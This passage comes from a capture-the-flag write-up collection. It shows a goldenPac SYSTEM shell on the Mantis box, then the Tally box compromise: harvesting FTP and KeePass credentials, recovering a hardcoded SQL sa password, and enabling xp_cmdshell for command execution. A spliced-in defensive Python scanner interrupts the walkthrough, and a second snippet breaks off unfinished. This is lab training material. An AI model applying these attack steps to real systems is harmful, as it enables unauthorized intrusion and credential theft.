![](prg/5/4.png)
And we're logged in as admin!
![](prg/5/5.png)
However this is something of a rabbit hole, which is part of why this box is rated hard. The next step is to poke around the SQL server on port 1433:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ sudo apt install dbeaver -y
![](prg/5/6.png) ![](prg/5/7.png) ![](prg/5/8.png) ![](prg/5/9.png)
And here we have found the user james' credentials:
james@htb.local
J@m3s_P@ssW0rd!
## **Part 3 : Getting Root Access**
Now, in order to gain root access on the box, we're going to use impacket's goldenPac.py, which finishes with a psexec-style shell:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ locate goldenPac.py
/usr/share/doc/python3-impacket/examples/goldenPac.py
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ cd /usr/share/doc/python3-impacket/examples/
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
→ python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
Once you have pasted in james' password, wait a bit for impacket to do its work, and you get a SYSTEM shell on the box:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
→ python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[-] Couldn't get forest info ([Errno Connection error (htb.local:445)] timed out), continuing
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file cviDLGQS.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service dqDR on 10.10.10.52.....
[*] Starting service dqDR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
From here we can type out both flags:
C:\Windows\system32>type C:\Users\james\Desktop\user.txt
8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
20XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you have it!
## **Conclusion**
Here we can see the progress graph :
![](img/5_graph.png)
797
Hard/6.md Normal file
@ -0,0 +1,797 @@
# Tally Writeup
![](img/7.png)
## Introduction :
Tally is a hard windows box released back in November 2017.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ sudo nmap -vvv -sTU -p- 10.10.10.59 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 139/tcp on 10.10.10.59
Discovered open port 135/tcp on 10.10.10.59
Discovered open port 21/tcp on 10.10.10.59
Discovered open port 80/tcp on 10.10.10.59
Discovered open port 445/tcp on 10.10.10.59
Discovered open port 47001/tcp on 10.10.10.59
Discovered open port 49665/tcp on 10.10.10.59
Discovered open port 32846/tcp on 10.10.10.59
Discovered open port 32844/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 49669/tcp on 10.10.10.59
Discovered open port 32843/tcp on 10.10.10.59
Discovered open port 15567/tcp on 10.10.10.59
Discovered open port 81/tcp on 10.10.10.59
Discovered open port 49670/tcp on 10.10.10.59
Discovered open port 5985/tcp on 10.10.10.59
Discovered open port 1433/tcp on 10.10.10.59
Discovered open port 49668/tcp on 10.10.10.59
Discovered open port 808/tcp on 10.10.10.59
Discovered open port 49667/tcp on 10.10.10.59
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ nmap -sCV -p21,80,81,135,139,445,808,1443 10.10.10.59
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 18:12 CET
Nmap scan report for 10.10.10.59
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-generator: Microsoft SharePoint
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1443/tcp closed ies-lm
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-22T17:12:21
|_ start_date: 2020-12-22T17:08:42
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.79 seconds
## **Part 2 : Getting User Access**
Nmap found port 80 open and identified it as SharePoint, so let's run gobuster on it with a SharePoint wordlist:
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ echo '10.10.10.59 tally.htb' >> /etc/hosts
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://tally.htb/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://tally.htb/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/22 18:18:15 Starting gobuster
===============================================================
/_app_bin (Status: 301)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wt/forms/common.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/3082: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin/operations.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/1033: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/50: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wp/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/masterpage/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/60: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:30 [!] Get http://tally.htb/_catalogs/lt/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/_layouts (Status: 301)
/_controltemplates (Status: 301)
/_layouts/1033 (Status: 301)
/_layouts/1033/avreport.htm (Status: 200)
/_layouts/1033/filedlg.htm (Status: 200)
/_layouts/1033/fontdlg.htm (Status: 200)
/_layouts/1033/error.htm (Status: 200)
/_layouts/1033/images (Status: 301)
/_layouts/1033/iframe.htm (Status: 200)
/_layouts/1033/instable.htm (Status: 200)
/_layouts/1033/menu.htc (Status: 200)
/_layouts/1033/menubar.htc (Status: 200)
/_layouts/1033/selcolor.htm (Status: 200)
/_layouts/1033/spthemes.xml (Status: 200)
/_layouts/1033/spthemes.xsd (Status: 200)
/_layouts/accessdenied.aspx (Status: 302)
/_layouts/addfieldfromtemplate.aspx (Status: 302)
/_layouts/aclinv.aspx (Status: 302)
/_layouts/addrole.aspx (Status: 302)
/_layouts/addcontenttypetolist.aspx (Status: 302)
/_layouts/addwrkfl.aspx (Status: 302)
/_layouts/adminrecyclebin.aspx (Status: 302)
/_layouts/approve.aspx (Status: 302)
/_layouts/advsetng.aspx (Status: 302)
/_layouts/aspxform.aspx (Status: 302)
/_layouts/addnavigationlinkdialog.aspx (Status: 200)
/_layouts/addfiletype.aspx (Status: 200)
/_layouts/areacachesettings.aspx (Status: 200)
/_layouts/areanavigationsettings.aspx (Status: 200)
/_layouts/addcontentsource.aspx (Status: 200)
/_layouts/areatemplatesettings.aspx (Status: 200)
/_layouts/areawelcomepage.aspx (Status: 200)
/_layouts/associatedgroups.aspx (Status: 302)
/_layouts/assocwrkfl.aspx (Status: 302)
/_layouts/addservernamemappings.aspx (Status: 200)
/_layouts/assetedithyperlink.aspx (Status: 200)
/_layouts/assetportalbrowser.aspx (Status: 200)
/_layouts/audience_defruleedit.aspx (Status: 200)
/_layouts/audience_edit.aspx (Status: 200)
/_layouts/audience_main.aspx (Status: 200)
/_layouts/audience_sched.aspx (Status: 200)
/_layouts/assetuploader.aspx (Status: 200)
/_layouts/audience_memberlist.aspx (Status: 200)
/_layouts/audience_list.aspx (Status: 200)
/_layouts/assetimagepicker.aspx (Status: 200)
/_layouts/backlinks.aspx (Status: 302)
/_layouts/avreport.aspx (Status: 302)
/_layouts/authenticate.aspx (Status: 302)
/_layouts/bdcadminui/addbdcapplication.aspx (Status: 200)
/_layouts/bdcadminui/bdcapplications.aspx (Status: 200)
/_layouts/auditsettings.aspx (Status: 200)
/_layouts/barcodeimagefromitem.aspx (Status: 200)
/_layouts/bdcadminui/bdcentities.aspx (Status: 200)
/_layouts/bdcadminui/editbdcaction.aspx (Status: 200)
/_layouts/audience_view.aspx (Status: 200)
/_layouts/bdcadminui/addbdcaction.aspx (Status: 200)
Out of all that output, the path worth finding is _layouts/15/viewlsts.aspx:
![](prg/6/1.png)
In Documents there's a file called "ftp-details":
![](prg/6/2.png)
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ mv ~/Downloads/ftp-details.docx .
mv: cannot stat '/home/nothing/Downloads/ftp-details.docx': No such file or directory
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ ls -lash ftp-details.docx
12K -rw-r--r-- 1 nothing nothing 11K Dec 22 18:23 ftp-details.docx
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ file ftp-details.docx
ftp-details.docx: Zip archive data, at least v1.0 to extract
[ 10.10.14.6/23 ] [ /dev/pts/3 ] [~/_HTB/Tally]
→ lowriter ftp-details.docx
![](prg/6/4.png)
So we can add that domain name to our hosts file:
[ 10.10.14.6/23 ] [ /dev/pts/6 ] [~/_HTB/Tally]
→ sudo vim /etc/hosts
10.10.10.59 tally.htb tally.htb.local
And under Site Pages you're supposed to find a page called "FinanceTeam":
![](prg/6/3.png) ![](prg/6/5.png)
Here we're pointed towards an ftp_user account for the "intranet folder", so combining what we gathered so far we have a candidate credential pair: **ftp_user:UTDRSCH53c"$6hys**. Naturally we try it over FTP, since our nmap scan picked up port 21:
[ 10.10.14.6/23 ] [ /dev/pts/8 ] [~]
→ ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:nothing): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-31-17 10:51PM <****DIR> From-Custodian
10-01-17 10:37PM <****DIR> Intranet
08-28-17 05:56PM <****DIR> Logs
09-15-17 08:30PM <****DIR> To-Upload
09-17-17 08:27PM <****DIR> User
226 Transfer complete.
ftp> exit
221 Goodbye.
And here we get a few directories so let's just use wget to get what they contain recursively:
[ 10.10.14.6/23 ] [ /dev/pts/8 ] [_HTB/Tally/ftp]
→ wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@tally.htb.local'
--2020-12-22 23:06:07-- ftp://ftp_user:*password*@tally.htb.local/
=> tally.htb.local/.listing
Resolving tally.htb.local (tally.htb.local)... 10.10.10.59
Connecting to tally.htb.local (tally.htb.local)|10.10.10.59|:21... connected.
Logging in as ftp_user ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> PASV ... done. ==> LIST ... done.
tally.htb.local/.listing [ <=> ] 244 --.-KB/s in 0s
==> PASV ... done. ==> LIST ... done.
[...]
And now let's go through what we're downloading:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
→ du -hs tally.htb.local
99M tally.htb.local
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
→ tree tally.htb.local
tally.htb.local
├── From-Custodian
│   ├── RED-528103410.log
│   ├── RED-528113411.log
│   ├── RED-528123412.log
│   ├── RED-528133413.log
│   ├── RED-5281341.log
│   ├── RED-528143414.log
│   ├── RED-528153415.log
│   ├── RED-528163416.log
│   ├── RED-528173417.log
│   ├── RED-528183418.log
│   ├── RED-528193419.log
│   ├── RED-528203420.log
│   ├── RED-528213421.log
│   ├── RED-528223422.log
│   ├── RED-528233423.log
│   ├── RED-5282342.log
│   ├── RED-528243424.log
│   ├── RED-528253425.log
│   ├── RED-528263426.log
│   ├── RED-528273427.log
│   ├── RED-528283428.log
│   ├── RED-528293429.log
│   ├── RED-528303430.log
│   ├── RED-528313431.log
│   ├── RED-528323432.log
│   ├── RED-528333433.log
│   ├── RED-5283343.log
│   ├── RED-528343434.log
│   ├── RED-528353435.log
│   ├── RED-528363436.log
│   ├── RED-528373437.log
│   ├── RED-528383438.log
│   ├── RED-528393439.log
│   ├── RED-528403440.log
│   ├── RED-528413441.log
│   ├── RED-528423442.log
│   ├── RED-528433443.log
│   ├── RED-5284344.log
│   ├── RED-528443444.log
│   ├── RED-528453445.log
│   ├── RED-528463446.log
│   ├── RED-528473447.log
│   ├── RED-528483448.log
│   ├── RED-528493449.log
│   ├── RED-528503450.log
│   ├── RED-5285345.log
│   ├── RED-5286346.log
│   ├── RED-5287347.log
│   ├── RED-5288348.log
│   └── RED-5289349.log
├── Intranet
│   └── Binaries
│   └── Firefox Setup 44.0.2.exe
├── Logs
│   ├── ftp_connect_8235771490510.txt
│   ├── ftp_connect_8235771490511.txt
│   ├── ftp_connect_8235771490512.txt
│   ├── ftp_connect_8235771490513.txt
│   ├── ftp_connect_8235771490514.txt
│   ├── ftp_connect_8235771490515.txt
│   ├── ftp_connect_8235771490516.txt
│   ├── ftp_connect_8235771490517.txt
│   ├── ftp_connect_8235771490518.txt
│   ├── ftp_connect_8235771490519.txt
│   ├── ftp_connect_823577149051.txt
│   ├── ftp_connect_8235771490520.txt
│   ├── ftp_connect_8235771490521.txt
│   ├── ftp_connect_8235771490522.txt
│   ├── ftp_connect_8235771490523.txt
│   ├── ftp_connect_8235771490524.txt
│   ├── ftp_connect_8235771490525.txt
│   ├── ftp_connect_8235771490526.txt
│   ├── ftp_connect_8235771490527.txt
│   ├── ftp_connect_8235771490528.txt
│   ├── ftp_connect_8235771490529.txt
│   ├── ftp_connect_823577149052.txt
│   ├── ftp_connect_8235771490530.txt
│   ├── ftp_connect_8235771490531.txt
│   ├── ftp_connect_8235771490532.txt
│   ├── ftp_connect_8235771490533.txt
│   ├── ftp_connect_8235771490534.txt
│   ├── ftp_connect_8235771490535.txt
│   ├── ftp_connect_8235771490536.txt
│   ├── ftp_connect_8235771490537.txt
│   ├── ftp_connect_8235771490538.txt
│   ├── ftp_connect_8235771490539.txt
│   ├── ftp_connect_823577149053.txt
│   ├── ftp_connect_8235771490540.txt
│   ├── ftp_connect_8235771490541.txt
│   ├── ftp_connect_8235771490542.txt
│   ├── ftp_connect_8235771490543.txt
│   ├── ftp_connect_8235771490544.txt
│   ├── ftp_connect_8235771490545.txt
│   ├── ftp_connect_8235771490546.txt
│   ├── ftp_connect_8235771490547.txt
│   ├── ftp_connect_8235771490548.txt
│   ├── ftp_connect_8235771490549.txt
│   ├── ftp_connect_823577149054.txt
│   ├── ftp_connect_8235771490550.txt
│   ├── ftp_connect_823577149055.txt
│   ├── ftp_connect_823577149056.txt
│   ├── ftp_connect_823577149057.txt
│   ├── ftp_connect_823577149058.txt
│   └── ftp_connect_823577149059.txt
├── To-Upload
│   ├── employees-id_number.xlsx
│   └── Invoices.zip
└── User
├── Administrator
│   └── New folder
├── Ekta
│   ├── OFSI_quick_guide_flyer.pdf
│   └── PSAIS_1_April_2017.pdf
├── Jess
│   └── actu8-espreadsheet-designer-datasheet.pdf
├── Paul
│   ├── financial-list-guide.pdf
│   ├── financial_sanctions_guidance_august_2017.pdf
│   ├── Monetary_penalties_for_breaches_of_financial_sanctions.pdf
│   └── New folder
├── Rahul
│   └── Mockups-Backup
├── Sarah
│   ├── MBSASetup-x64-EN.msi
│   ├── notes.txt
│   └── Windows-KB890830-x64-V5.52.exe
├── Stuart
│   ├── customers - Copy.csv
│   └── Unit4-Connect-Financials-Agenda.pdf
├── Tim
│   ├── Files
│   │   ├── bonus.txt
│   │   ├── KeePass-2.36
│   │   │   ├── KeePass.chm
│   │   │   ├── KeePass.exe
│   │   │   ├── KeePass.exe.config
│   │   │   ├── KeePassLibC32.dll
│   │   │   ├── KeePassLibC64.dll
│   │   │   ├── KeePass.XmlSerializers.dll
│   │   │   ├── License.txt
│   │   │   ├── Plugins
│   │   │   ├── ShInstUtil.exe
│   │   │   └── XSL
│   │   │   ├── KDBX_Common.xsl
│   │   │   ├── KDBX_DetailsFull_HTML.xsl
│   │   │   ├── KDBX_DetailsLight_HTML.xsl
│   │   │   ├── KDBX_PasswordsOnly_TXT.xsl
│   │   │   └── KDBX_Tabular_HTML.xsl
│   │   └── tim.kdbx
│   └── Project
│   ├── Communications
│   ├── Log
│   │   └── do to.txt
│   └── Vendors
└── Yenwi
└── Archive
27 directories, 130 files
And here we see something interesting: a KeePass database at User/Tim/Files/tim.kdbx, so we use keepass2john to extract its header into a crackable hash format:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
→ keepass2john tim.kdbx
tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da
Save the hash somewhere, then use hashcat to crack it:
hashcat -m 13400 tim.hash /usr/share/wordlists/rockyou.txt
Once it finishes, hashcat gives us the master password we need: simplementeyo
![](prg/6/5.png) ![](prg/6/6.png) ![](prg/6/7.png)
And we have new credentials: Finance:Acc0unting and cisco:cisco123. First let's investigate the ACCT share that the KeePass entry points us towards:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
→ sudo -i
[sudo] password for nothing:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mkdir /mnt/smb
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mount -t cifs -o username=Finance password=Acc0unting //10.10.10.59/ACCT /mnt/smb
mount: bad usage
Try 'mount --help' for more information.
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb
🔐 Password for Finance@//10.10.10.59/ACCT: **********
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→cd /mnt/smb
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→ ls -l
total 0
drwxr-xr-x 2 root root 0 Sep 17 2017 Customers
drwxr-xr-x 2 root root 0 Aug 28 2017 Fees
drwxr-xr-x 2 root root 0 Aug 28 2017 Invoices
drwxr-xr-x 2 root root 0 Sep 17 2017 Jess
drwxr-xr-x 2 root root 0 Aug 28 2017 Payroll
drwxr-xr-x 2 root root 0 Sep 1 2017 Reports
drwxr-xr-x 2 root root 0 Sep 17 2017 Tax
drwxr-xr-x 2 root root 0 Sep 13 2017 Transactions
drwxr-xr-x 2 root root 0 Sep 15 2017 zz_Archived
drwxr-xr-x 2 root root 0 Sep 17 2017 zz_Migration
The directory of interest is zz_Migration/Binaries/New Folder:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→ cd zz_Migration/Binaries/New\ Folder
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
→ ls -l
total 676308
-rwxr-xr-x 1 root root 389188014 Sep 13 2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root 18159024 Sep 11 2017 Macabacus2016.exe
-rwxr-xr-x 1 root root 21906356 Aug 30 2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root 774200 Sep 17 2017 putty.exe
-rwxr-xr-x 1 root root 483824 Sep 15 2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 254599112 Sep 11 2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root 215552 Sep 1 2017 tester.exe
-rwxr-xr-x 1 root root 7194312 Sep 13 2017 vcredist_x64.exe
Running strings on tester.exe turns up a hardcoded connection string:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
→ strings tester.exe | grep SQL
SQLSTATE:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
So here we have credentials for the SQL Server on port 1433: sa:GWE3V65#6KFH93@4GWTG2G. Let's connect with sqsh:
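The hardcoded DSN above is exactly what a pre-release check of binaries going onto a file share should catch. The following is an added Python example (not code from the writeup or from the box) that scans raw file bytes for ODBC/ADO-style connection strings in both narrow and UTF-16LE encodings and reports the server, database and user with the password masked, so a finding can be logged without copying the secret around. The sample bytes, host names and passwords are constructed placeholders, and the set of key names it recognises is an assumption covering the common ODBC and ADO spellings.

```python
import re
from typing import Dict, Iterator, List, Tuple

# ODBC/ADO-style connection strings are runs of KEY=VALUE pairs separated by ';'.
# Keys are letters, spaces or underscores; values are anything but ';' and NUL, so
# the pattern can be applied directly to raw file bytes. The lookbehind stops a
# key from starting in the middle of a longer token.
CONN_STRING_RE = re.compile(
    rb"(?<![A-Za-z0-9])(?:[A-Za-z_ ]+=[^;\x00]{1,200};){2,}[A-Za-z_ ]+=[^;\x00]{0,200};?"
)
LOCATOR_KEYS = {"driver", "server", "data source"}  # what makes a KEY=VALUE list a DSN (assumed set)
SECRET_KEYS = {"pwd", "password"}                   # what must never ship inside a binary


def _views(data: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield the raw bytes plus UTF-16LE-narrowed views; Windows binaries often
    store strings wide, and both byte alignments are tried."""
    yield "ascii", data
    for shift in (0, 1):
        narrowed = data[shift:].decode("utf-16-le", errors="ignore")
        yield f"utf16le+{shift}", narrowed.encode("latin-1", errors="replace")


def parse_conn_string(raw: bytes) -> Dict[str, str]:
    """Split 'K=V;K=V;' into a lower-cased key -> value dict."""
    pairs: Dict[str, str] = {}
    for field in raw.decode("ascii", errors="replace").split(";"):
        if "=" in field:
            key, value = field.split("=", 1)
            pairs[key.strip().lower()] = value.strip()
    return pairs


def redact(raw: bytes) -> str:
    """Return the connection string with password values masked."""
    out = []
    for field in raw.decode("ascii", errors="replace").split(";"):
        if "=" in field:
            key, value = field.split("=", 1)
            if key.strip().lower() in SECRET_KEYS:
                value = "****"
            out.append(f"{key}={value}")
    return ";".join(out) + ";"


def scan_blob(data: bytes, source: str = "<blob>") -> List[Dict[str, object]]:
    """Find embedded connection strings; report where they are, not the secret."""
    findings: List[Dict[str, object]] = []
    for encoding, text in _views(data):
        for match in CONN_STRING_RE.finditer(text):
            pairs = parse_conn_string(match.group(0))
            if not (pairs.keys() & LOCATOR_KEYS):
                continue  # some other KEY=VALUE list, not a DSN
            findings.append({
                "source": source,
                "encoding": encoding,
                "offset": match.start(),
                "server": pairs.get("server") or pairs.get("data source", ""),
                "database": pairs.get("database") or pairs.get("initial catalog", ""),
                "user": pairs.get("uid") or pairs.get("user id", ""),
                "has_secret": bool(pairs.keys() & SECRET_KEYS),
                "redacted": redact(match.group(0)),
            })
    return findings


def scan_file(path: str) -> List[Dict[str, object]]:
    with open(path, "rb") as fh:
        return scan_blob(fh.read(), path)


# Constructed sample standing in for a small Windows binary: one narrow (ASCII)
# DSN like the one found in tester.exe and one wide (UTF-16LE) DSN. Wide strings
# in PE files are 2-byte aligned, so the narrow part is padded to an even length.
_NARROW_PART = (
    b"\x00" * 16 + b"MZ junk \x90\x90 SQLSTATE:\x00"
    + b"DRIVER={SQL Server};SERVER=DBHOST,1433;DATABASE=appdb;UID=svc_app;PWD=Example-Secret-1;\x00"
    + b"more junk\x00"
)
_WIDE_PART = "Data Source=DBHOST2;Initial Catalog=reports;User ID=reader;Password=Example-Secret-2;".encode("utf-16-le")
SAMPLE_BINARY = _NARROW_PART + b"\x00" * (len(_NARROW_PART) % 2) + _WIDE_PART + b"\x00\x00"

if __name__ == "__main__":
    for finding in scan_blob(SAMPLE_BINARY, "constructed.exe"):
        print(finding)
```

Run it over a share with `scan_file` on each binary; anything with `has_secret` set is a credential that should live in a secret store or a Windows credential object, not in the executable, and the redacted string is safe to paste into the ticket.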
[ 10.10.14.6/23 ] [ /dev/pts/11 ] [~]
→ sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'id'
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the
security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more
information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
1>
So we're connected but component xp_cmdshell is turned off, so let's turn it on:
1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
Msg 15123, Level 16, State 1
Server 'TALLY', Procedure 'sp_configure', Line 62
The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
(return status = 1)
It seems the xp_cmdshell option doesn't exist; as the error message says, it is an advanced option, so let's enable advanced options first:
1> EXEC SP_CONFIGURE 'show advanced options', 1
2> reconfigure
3> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> EXEC SP_CONFIGURE 'xp_cmdshell', 1
2> reconfigure
3> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> xp_cmdshell "whoami"
2> go
output
-------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
tally\sarah
NULL
(2 rows affected, return status = 0)
And there we have it, we have code execution as the sarah user:
1> xp_cmdshell "whoami /priv"
2> go
output
-------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
**SeImpersonatePrivilege Impersonate a client after authentication Enabled**
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL
(13 rows affected, return status = 0)
Here we see that SeImpersonatePrivilege is enabled, so a RottenPotato-style token impersonation should work on this machine. Before that, let's get a proper reverse shell using nishang's [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1):
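To turn the privilege listing above into a repeatable check, here is an added Python example (not part of the writeup) that parses `whoami /priv` output as printed through xp_cmdshell, tolerating the NULL rows and separators, and flags the privileges that matter for escalation. The risk set and its one-line descriptions are our own triage assumptions, not an official list, and the sample text is constructed after the output above.

```python
from typing import Dict, List

# Privileges that let their holder escalate (token impersonation, debugging other
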